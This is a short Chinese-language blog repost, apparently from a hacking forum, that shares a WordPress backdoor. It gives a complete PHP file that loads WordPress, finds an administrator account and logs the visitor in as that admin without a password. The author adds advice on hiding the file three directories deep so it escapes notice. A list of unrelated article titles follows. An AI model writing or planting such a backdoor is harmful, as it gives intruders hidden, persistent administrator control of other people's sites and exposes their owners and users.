猥琐的wordpress后门分享
2024-08-26 19:24:10
https://www.t00ls.net/thread-37312-1-1.html
一个可以自动调用管理员帐号登录wordpress后台的方法。
<?php require('../../../wp-blog-header.php'); //我基本都是放到3级目录下。也可以放到根目录,但是容易被发现。
$query_str = "SELECT ID FROM $wpdb->users";
$user_ids = $wpdb->get_results($query_str);
foreach ($user_ids as $uid) {
$user_id = $uid->ID;
if (user_can($user_id, 'administrator')) {
$user_info = get_userdata($user_id);
$user_login = $user_info->user_login;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
echo "You are logged in as $user_login";
if (function_exists('get_admin_url')) {
wp_redirect(get_admin_url());
} else {
wp_redirect(get_bloginfo('wpurl') . '/wp-admin');
}
exit;
}
} ?>
最新文章
- 7.9 数据注解特性--ForeignKey
- iOS 中常用的对密码进行MD5加密
- ajaxsearch要点1
- 浅谈session/cookie
- UML用例图(转载)
- STM32F103 与 STM32F407引脚兼容问题
- python urllib基础学习
- codeforces 659E . New Reform 强连通
- 老李分享:Eclipse中开发性能测试loadrunner脚本
- clear命令新认识
- 【dfs+连通分量】Bzoj1123 POI2008 BLO
- 通过 UI 管理 docker
- Java代码优化总结(持续更新)
- GFS浅析
- Unity之获取资源包的路径
- python 全栈开发,Day35(TCP协议 粘包现象 和解决方案)
- linux下mysql 8.0忘记密码后重置密码
- Unity 3D UI Essentials 学习
- Linq 对List的一些操作
- 第10章 线程控制(5)_多线程下的fork
热门文章
- vuex 使用笔记
- code vs 1098 均分纸牌(贪心)
- 基于SSM的租赁管理系统0.2_20161225_开发环境
- sql server报:名称 不是有效的标识符
- centos7下操作防火墙
- Python中的网络编程
- https://github.com/chenghuige/tensorflow-exp/blob/master/examples/sparse-tensor-classification/
- ExtJS基础知识总结:自定义日历和ComboBox控件(二)
- 【DWR系列06】- DWR日志及js压缩
- 提高 ASP.NET Web 应用性能